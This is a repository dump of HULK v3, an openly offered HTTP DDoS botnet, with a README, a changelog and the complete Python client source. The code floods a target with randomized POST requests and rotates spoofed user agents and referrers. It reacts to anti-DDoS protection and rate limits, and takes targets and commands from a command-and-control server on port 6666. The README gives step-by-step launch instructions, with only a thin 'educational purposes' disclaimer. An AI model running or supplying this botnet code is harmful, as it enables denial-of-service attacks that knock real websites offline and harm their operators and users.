README.md
<!--
    Title: Hulk v3
    Description: Asynchronous HTTP Botnet for Distributed Denial of Service (DDoS)
    Author: Hyperclaw79
    Url: https://github.com/Hyperclaw79/HULK-v3
    Image: https://raw.githubusercontent.com/Hyperclaw79/Hulk-v3/async/assets/Hulk.png
-->

<meta name="title" content="Hulk v3" />
<meta name="description" content="Asynchronous HTTP Botnet for Distributed Denial of Service (DDoS)" />
<meta name="author" content="Hyperclaw79" />
<meta name="url" content="https://github.com/Hyperclaw79/HULK-v3" />
<meta name="image" content="https://raw.githubusercontent.com/Hyperclaw79/Hulk-v3/async/assets/Hulk.png" />
<meta name="keywords" content="async,asynchronous,ddos,ddos-attack,ddos-script,electron,gui,http,https,hulk,named-pipes,nextron,nodejs,python,python3,typescript,websockets" />
<meta name="og:title" content="Hulk v3" />
<meta name="og:description" content="Asynchronous HTTP Botnet for Distributed Denial of Service (DDoS)" />
<meta name="og:author" content="Hyperclaw79" />
<meta name="og:url" content="https://github.com/Hyperclaw79/HULK-v3" />
<meta name="og:image" content="https://raw.githubusercontent.com/Hyperclaw79/Hulk-v3/async/assets/Hulk.png" />
<meta name="og:keywords" content="async,asynchronous,ddos,ddos-attack,ddos-script,electron,gui,http,https,hulk,named-pipes,nextron,nodejs,python,python3,typescript,websockets" />


![Hulk_Banner](/assets/Hulk_banner.png)

![Python Version](https://img.shields.io/badge/python-3.8+-blue?style=for-the-badge)
![License](https://img.shields.io/badge/License-GNU-green?style=for-the-badge)
![Build and Package](https://img.shields.io/github/workflow/status/Hyperclaw79/HULK-v3/Build%20and%20Package/async?style=for-the-badge)
![Codacy branch grade](https://img.shields.io/codacy/grade/c4f7560e8231423691d819129c7b3afa/async?style=for-the-badge)


## ⚠️ Disclaimer

| **Hulk is meant for educational and research purposes only.<br />Any malicious usage of this tool is prohibited.<br />The authors must not to be held responsible for any consequences from the usage of this tool.** |
| :--- |


## Introducing **HULK-v3** :robot:

| :information_source: | **Hulk** is a *Distributed Denial of Service* tool that can put heavy load on HTTPS servers, in order to bring them to their knees, by exhausting the resource pool. |
| :---: | :--- |

### Check out Hulk in Action

**GUI :desktop_computer:**
![Hulk_demo](/assets/Hulk_demo.gif)

**Server :computer:**
![Hulk_server](/assets/Hulk_server.png)
**Client/Bot :space_invader:**
![Hulk_client](/assets/Hulk_client.png)

:green_circle: To get started, expand the sections below to read about them.


## Changelog :page_with_curl:
You can refer the Changelog [here](/CHANGELOG.md).


<details markdown=1><summary markdown="span"><h2>Usage :book:</h2></summary>

1.  Run `pip install -r requirements_(linux/win).txt` before starting this script.
    > Ex: On Windows: `pip install -r requirements_win.txt`
    > Ex: On Linux: `pip install -r requirements_linux.txt`

2.  Launch the `hulk_launcher.py server` with the target website as arg.
    > Ex: `python hulk_launcher.py server https://testdummysite.com`
    >
    > Append `--persistent False` to kill the botnet after a succesfull DDoS.
    >
    > Append `--gui` if you are running the GUI in parallel.

3.  Launch the `hulk_launcher.py client` to spawn multiple processes of hulk - one per CPU Core.
    > Ex: `python hulk_launcher.py client [localhost]`
    >
    > If the server is running remotely, replace localhost with the server's IP.

4. To run the GUI, you need to:
    * Install `NodeJS`, change to `gui` directory and use `npm install`.
    * Launch the GUI with `npm run dev`.

5.  Sit back and sip your coffee while the carnage unleashes! 😈

*(P.S. Do not run the binaries (except `hulk_gui`) directly, use them from command line like shown above without using `python`.)*

</details>


<details markdown=1><summary markdown="span"><h2>Syntax Help :scroll:</h2></summary>

### Server :computer:
```py
usage: hulk_launcher.py server [-h] [-p PORT] [-m MAX_MISSILES] [--persistent] [--gui] target

The Hulk Server Launcher

positional arguments:
target                the target url.

options:
-h, --help            show this help message
-p PORT, --port PORT  the Port to bind the server to.
-m MAX_MISSILES, --max_missiles MAX_MISSILES
                        the maximum number of missiles to connect to.
--persistent          keep attacking even after target goes down.
--gui                 run on the GUI mode.
```

### Client :space_invader:
```py
usage: hulk_launcher.py client [-h] [-r ROOT_IP] [-p ROOT_PORT] [-n NUM_PROCESSES] [-s]

The Hulk Bot Launcher

options:
-h, --help            show this help message
-r ROOT_IP, --root_ip ROOT_IP
                        IPv4 Address where Hulk Server is running.
-p ROOT_PORT, --root_port ROOT_PORT
                        Port where Hulk Server is running.
-n NUM_PROCESSES, --num_processes NUM_PROCESSES
                        Number of Processes to launch.
-s, --stealth         Stealth mode.
```

</details>


<details markdown=1><summary markdown="span"><h2>Architecture :gear:</h2></summary>

| :warning: The intention of Hulk is to demonstrate the damage that a DDoS attack can do to a server if unprotected. |
| :--- |
| :bulb: Please go through the code for full details. I'm keeping it well documented and request the contributors to do so too. |

Hulk consists of 2 major and 1 optional components:
 - Server
 - Client
 - [Gui]

<p align="center">

 ![Hulk_architecture](/assets/Hulk_architecture.svg)

</p>

**Client :space_invader:**

> The core part of Hulk is the `Hulk client` aka `Hulk.py`. \
This client\bot launches a barrage of `asynchronous HTTP requests` to the target server. \
These incoming requests, put a burden on the target and makes it slow to respond. \
With the launcher script, we can launch multiple instances of Hulk using `multi-threading`. \
The target will be hit with so many requests that it will ultimately break into a `500 error`. \
Usually, the client completes 500 attacks and sends back the list of status messages. \
In case of special events, the client will immediately send an Interrupt message to the server. \
Example Special Events: *Successful DDoS*, *404 Target Not Found*, etc.

**Server :computer:**

> Hulk was originally a single instanced DoS script. However, it has been modified to be run as multiple instances. \
The cluster of many such instances is called a `botnet`. And this botnet can be controlled and monitored by the `Server`. \
The `Server` and `Client` communicate with each other through TCP `WebSockets`.
Based on the settings, this is usally a persistent bidirectional channel. \
In case the server receives `Interrupts` from a client, it will send out a broadcast message to all the clients, asking them to stop the attacks. \
The clients go to Standby mode and await further instructions from the server.
>
> The server can also send information to the GUI to keep a track of the botnet. \
This information is sent via Unix\Windows `Named Pipes` for low latency `IPC`.

**GUI :desktop_computer:**

> The GUI is a `NextJS` web application that is used to monitor the botnet via Named Pipes. \
When run as a binary, GUI makes use of `Electron` which exposes the information directly to the Frontend. \
When run as a Node process, a node server listens to the Named Pipe and passes on the information to a HTTP Streaming API. \
Then the frontend will pick it up from the API using `EventSource`.

</details>


<details markdown=1><summary markdown="span"><h2>Acknowledgements :busts_in_silhouette:</h2></summary>

### Authors :writing_hand:
|         Name       | Version |
|--------------------|---------|
| **Hyperclaw79**    |   2.0+  |
| **Barry Shteiman** |   1.0   |

### Contributors :handshake:
Thanks for contributing to the repo. Follow the [Contribution Guide](/.github/CONTRIBUTING.md) and open a PR.

| Contributor | Contribution |
| :--: | :--: |
| [Nexuzzzz](https://github.com/Nexuzzzz) | Fixed typo in the code |

</details>


<details markdown=1><summary markdown="span"><h2>License :page_facing_up:</h2></summary>

HULK v3 is a Python 3 compatible Asynchronous Distributed Denial of Service Script.\
[Original script](http://www.sectorix.com/2012/05/17/hulk-web-server-dos-tool/) was created by Barry Shteiman.
You can use that one if you have Python 2.

Using a [GNU license](/LICENSE) cause there was no mention about any license used by Barry.
Feel free to modify and share it, but leave some credits to us both and don't hold us liable.

</details>


CHANGELOG.md
## Changelog
### v3.2
    1. Added a (NextJs) GUI to show the bots in action.
    2. Project-wide improvements and refactoring.
    3. Added Workflows to automatically build binaries in Linux and Windows.
    4. Improved contribution-friendlyness by completing all community guidelines.

### v3.1
    1. Refactored the code to make it more performant.
    2. Standardized the code using PEP8 and Pylint.
    3. Switched to Multithreaded Asyncio.
    4. Added a new Launcher script to launch either the Client or the Server.
    5. Added Argument Parser to increase the flexibility of the tool.
    6. Fixed bugs in HTTP Requests.
    7. Fixed bugs in botnet communication.
    8. Enhanced Logging for Server.
    9. Added Stealth Mode for Hulk Client.
    10. Improved documentation and overall readability.

### v3.0
    1. Switched from Multiprocessing to asynchronous event loops.
    2. Included a Root Server to control all bots for a DDoS.
    3. Fixed some issues with request generation and headers.
    4. Improved attack and overall performance.
    5. Switched to Json Payload for POST attacks.
    6. Synchronized target status across all bots.
    7. Bots are reusable if the target isn't down within 500 attacks.
    8. Improved Documentation.
    9. Added optional Persistence after successful DDoS.
### v2.0
    1)Syntax Corrections.
    2)Replaced urllib2 module with requests module.
    3)Replaced support for Http with support for Https.
    4)Added more HTTP Status Error Codes for detection and control.
    5)Randomized buildblock size a bit more.
    6)Deprecated 'safe'.
    7)Improved Documentation.
    8)Payload Obfuscation.
    9)Converted global variables to class variables.
    10)Replaced Threading with Multiprocessing.
    11)Introduced Shared Memory for interprocess communication. 
    12)Performed other performance tweaks.

-------------------------------------------------------------------------------------------------


client/hulk.py
#!/usr/bin/env python3

"""
Hulk v3

The main module of the Hulk v3 which launches the HTTP missiles.
Each process represents a single bot in the botnet.
"""

from __future__ import annotations

import argparse
import asyncio
import contextlib
import logging
import platform
import random
import re
import socket
import string
import sys
import threading
from typing import TYPE_CHECKING, List, Optional, Tuple
from urllib.parse import urljoin

import aiohttp

try:  # When running directly.
    from enums import ClientCommands, ServerCommands, StatusCodes
except ImportError:  # When imported into launcher.
    from client.enums import ClientCommands, ServerCommands, StatusCodes

if TYPE_CHECKING:
    from asyncio import Task


class CustomFilter(logging.Filter):
    """
    Custom filter to add IP and Port to Logs.
    """

    def __init__(self) -> None:
        super().__init__()
        self._ip = threading.get_native_id()
        self._port = -1

    def update_address(self, address: Tuple[str, int]):
        """
        Update the IP and Port.

        :param address: The IP and Port.
        :type address: Tuple[str, int]
        """
        self._ip, self._port = address

    def filter(self, record: logging.LogRecord):
        """
        Filter the log record.

        :param record: The log record to filter.
        :type record: logging.LogRecord
        :return: Whether the record should be filtered.
        :rtype: bool
        """
        record.ip = self._ip
        record.port = self._port
        return True


LOGGER = logging.getLogger("Hulk_Client")
handler = logging.StreamHandler(sys.stdout)
handler.setFormatter(
    logging.Formatter(
        fmt="[%(ip)s:%(port)d] %(message)s",
    )
)
LOGGER.addHandler(handler)
LOGGER.setLevel(logging.INFO)
FILTER = CustomFilter()
LOGGER.addFilter(FILTER)


class Missile:
    """
    The Missile class which will hammer the target with HTTP requests.

    :param com: The Comms class which is used to communicate with the server.
    :type com: :class:`Comms`
    :param target: The target URL to attack.
    :type target: str
    """
    def __init__(self, com: Comms, target: str):
        self.comms = com
        self.url = target
        self.host = urljoin(self.url, '/')
        self.method = "post"
        self.count = 0

    @staticmethod
    def generate_junk(size: int) -> str:
        """
        Generate random junk data.

        :param size: The size of the junk data.
        :type size: int
        :return: The random junk data.
        :rtype: str
        """
        return ''.join(
            random.choices(
                string.ascii_letters + string.digits,
                k=random.randint(3, size)
            )
        )

    async def _launch(self, session: aiohttp.ClientSession) -> int:
        """
        Launch a single HTTP request and return the response.

        :param session: The session to use for the request.
        :type session: :class:`aiohttp.ClientSession`
        :return: The response status code.
        :rtype: int
        """
        self.count += 1
        FILTER.update_address(self.comms.address)
        LOGGER.info(
            "Launching attack no. %d on %s",
            self.count, self.url.split('?')[0]
        )
        headers, payload = self._get_payload()
        try:
            async with session.request(
                method=self.method,
                url=self.url,
                headers=headers,
                json=payload
            ) as resp:
                status = resp.status
                reason = resp.reason
                if any([
                    resp.headers.get('server', '').lower() == "cloudflare",
                    status == 400
                ]):
                    FILTER.update_address(self.comms.address)
                    LOGGER.error('\nUrl has DDoS protection.')
                    self.comms.send(StatusCodes.ANTI_DDOS)
                elif status == 403:
                    FILTER.update_address(self.comms.address)
                    LOGGER.error(
                        '\nUrl is protected. Please retry with another url.'
                    )
                    self.comms.send(StatusCodes.FORBIDDEN)
                elif status == 404:
                    FILTER.update_address(self.comms.address)
                    LOGGER.error(
                        '\nUrl not found. Please retry with another url.'
                    )
                elif status == 405:
                    self.method = "get"
                elif status == 429:
                    FILTER.update_address(self.comms.address)
                    LOGGER.warning(
                        '\nToo many requests detected. Slowing down a bit.'
                    )
                    await asyncio.sleep(random.uniform(5.0, 7.5))
                elif status >= 500:
                    FILTER.update_address(self.comms.address)
                    LOGGER.info("Successfully DoSed %s!", self.url)
                    self.comms.send(StatusCodes.PWNED)
                elif status >= 400:
                    FILTER.update_address(self.comms.address)
                    LOGGER.warning(
                        "\nUnknown status code detected.\n%d\n%s",
                        status, reason
                    )
            return status
        except aiohttp.ClientConnectorError:
            return 69

    def _get_payload(self) -> Tuple[dict, dict]:
        """
        Generate the payload for the HTTP request.

        :return: The headers and payload for the HTTP request.
        :rtype: Tuple[dict, dict]
        """
        ua_list = [
            'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3)'
            'Gecko/20090913 Firefox/3.5.3',
            'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3)'
            'Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
            'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3)'
            'Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
            'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1)'
            'Gecko/20090718 Firefox/3.5.1',
            'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US)'
            'AppleWebKit/532.1 (KHTML, like Gecko)'
            'Chrome/4.0.219.6 Safari/532.1',
            'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64;'
            'Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
            'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0;'
            'Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322;'
            '.NET CLR 3.5.30729; .NET CLR 3.0.30729)',
            'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2;'
            'Win64; x64; Trident/4.0)',
            'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0;'
            'SV1; .NET CLR 2.0.50727; InfoPath.2)',
            'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
            'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
            'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51'
        ]
        referrer_list = [
            'https://www.google.com/?q=',
            'https://www.usatoday.com/search/results?q=',
            'https://engadget.search.aol.com/search?q=',
            'https://cloudfare.com',
            'https://github.com',
            'https://en.wikipedia.org',
            'https://youtu.be',
            'https://mozilla.org',
            'https://microsoft.com',
            'https://wordpress.org',
            self.host
        ]
        headers = {
            'Cache-Control': 'no-cache',
            'Accept': 'text/html,application/xhtml+xml,application/xml;'
            'q=0.9,image/webp,image/apng,*/*;q=0.8',
            'Accept-Encoding': 'gzip, deflate, br',
            'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
            'Content-Encoding': 'deflate',
            'Connection': 'keep-alive',
            'Content-Type': 'application/json',
            'Keep-Alive': str(random.randint(110, 120)),
            'User-Agent': random.choice(ua_list),
            'Referer': random.choice(referrer_list),
        }
        payload = {
            self.generate_junk(
                random.randint(5, 10)
            ): self.generate_junk(
                random.randint(500, 1000)
            )
        }
        return headers, payload

    async def attack(self, count: int):
        """
        Launch the attack.

        :param count: The number of requests to launch.
        :type count: int
        """
        async with aiohttp.ClientSession(
            connector=aiohttp.TCPConnector(limit=0),
        ) as session:
            tasks = [
                asyncio.create_task(self._launch(session))
                for _ in range(count)
            ]
            status_list = set(await asyncio.gather(*tasks))
        if all(
            status < 500 and status not in (403, 404, 69)
            for status in status_list
        ):
            FILTER.update_address(self.comms.address)
            LOGGER.info(
                "Finished Performing %d attacks "
                "but the target is still intact...",
                self.count
            )
        with contextlib.suppress(ConnectionError):
            root_server = self.comms.root_server
            root_server.sendall(
                f"<{ClientCommands.READ_STATUS}>".encode()
            )
            root_server.sendall(
                b', '.join(
                    f"<{status}>".encode()
                    for status in status_list
                )
            )


class Comms:
    """
    The class which communicates with the root server.

    :param root_ip: The root server's address.
    :type root_ip: str
    :param root_port: The root server's port.
    :type root_port: Optional[int]
    """
    def __init__(
        self, root_ip: str,
        root_port: Optional[int] = 6666
    ):
        self.root_ip = root_ip
        self.root_port = root_port
        self._root_server = None
        self._tasks: List[Task] = []

    @property
    def root_server(self):
        """
        Get the root server socket from given IP and Port.

        :param root_ip: IP of the root server.
        :type root_ip: str
        :param root_port: Port of the root server.
        :type root_port: Optional[int]
        :return: The root server socket.
        :rtype: socket.socket
        """
        if self._root_server is not None:
            return self._root_server
        root = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        LOGGER.info("Trying to establish connection with Root server.")
        while True:
            try:
                with contextlib.suppress(ConnectionError):
                    root.connect((self.root_ip, self.root_port))
                    break
            except KeyboardInterrupt:
                sys.exit(0)
        self._root_server = root
        FILTER.update_address(self.address)
        LOGGER.info(
            "Connected to root @ [%s:%d]!",
            self.root_ip, self.root_port
        )
        root.sendall(f"<{ClientCommands.SEND_TARGET}>".encode())
        return root

    @property
    def address(self):
        """
        Get the address of the client.

        :return: The address of the client.
        :rtype: str
        """
        if self._root_server is None:
            return (threading.get_native_id(), -1)
        return self._root_server.getsockname()

    def close_server(self):
        """
        Close the root server socket.
        """
        if self._root_server is not None:
            self._root_server.close()
            self._root_server = None

    async def monitor(self):
        """
        Monitor the root server for commands.
        """
        root = self.root_server
        while True:
            try:
                command = root.recv(1024)  # message
                message = command.decode()
                if message == str(ServerCommands.TERMINATE):
                    for task in self._tasks:
                        task.cancel()
                    root.sendall(f"<{ClientCommands.KILLED}>".encode())
                    root.close()
                    sys.exit(0)
                elif message == str(ServerCommands.STOP):
                    for task in self._tasks:
                        task.cancel()
                    FILTER.update_address(self.address)
                    LOGGER.warning(
                        "Stopped by the root server.\n"
                        "Switching to Stand By mode."
                    )
                    root.sendall(f"<{ClientCommands.STANDBY}>".encode())
                elif message == str(ServerCommands.READ_TARGET):
                    target = root.recv(1024).decode()  # Target
                    missile = Missile(self, target)
                    task = asyncio.create_task(
                        missile.attack(500)
                    )
                    self._tasks.append(task)
                    await task
            except ConnectionResetError:
                FILTER.update_address(self.address)
                LOGGER.warning(
                    "Connection with the root server was reset.\n"
                    "Switching to Stand By mode."
                )
                self._root_server = None
                root = self.root_server
            except KeyboardInterrupt:
                for task in self._tasks:
                    task.cancel()
                root.sendall(f"<{ClientCommands.KILLED}>".encode())
                root.close()
                sys.exit(0)

    def send(self, status_code: StatusCodes):
        """
        Send a status code to the root server.

        :param status_code: The status code to send.
        :type status_code: StatusCodes
        """
        with contextlib.suppress(ConnectionError):
            for msg in [ClientCommands.READ_STATUS, status_code]:
                self._root_server.sendall(f"<{msg}>".encode())


def modify_parser(parser: argparse.ArgumentParser):
    """
    Useful for exposing the parser modification to external modules.

    :param parser: The parser to modify.
    :type parser: argparse.ArgumentParser
    """
    def ip_address(arg: argparse.Action):
        """
        Validate the IP address.

        :param arg: The argument to validate.
        :type arg: argparse.Action
        :return: The validated argument.
        :rtype: argparse.Action
        """
        ip_pattern = re.compile(
            r"^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$"
            r"|^localhost$"
        )
        if not ip_pattern.match(arg):
            raise argparse.ArgumentTypeError(
                f"{arg} is not a valid IP address."
            )
        return arg
    parser.add_argument(
        '-r', '--root_ip',
        help='IPv4 Address where Hulk Server is running.',
        default="localhost",
        type=ip_address
    )
    parser.add_argument(
        '-p', '--root_port',
        help='Port where Hulk Server is running.',
        default=6666
    )
    parser.add_argument(
        '-s', '--stealth',
        help='Stealth mode.',
        action='store_true',
    )


if __name__ == "__main__":
    argparser = argparse.ArgumentParser()
    modify_parser(argparser)
    args = argparser.parse_args()

    comms = Comms(args.root_ip, args.root_port)

    if platform.system() == 'Windows':
        asyncio.set_event_loop_policy(
            asyncio.WindowsSelectorEventLoopPolicy()
        )
    asyncio.run(comms.monitor())
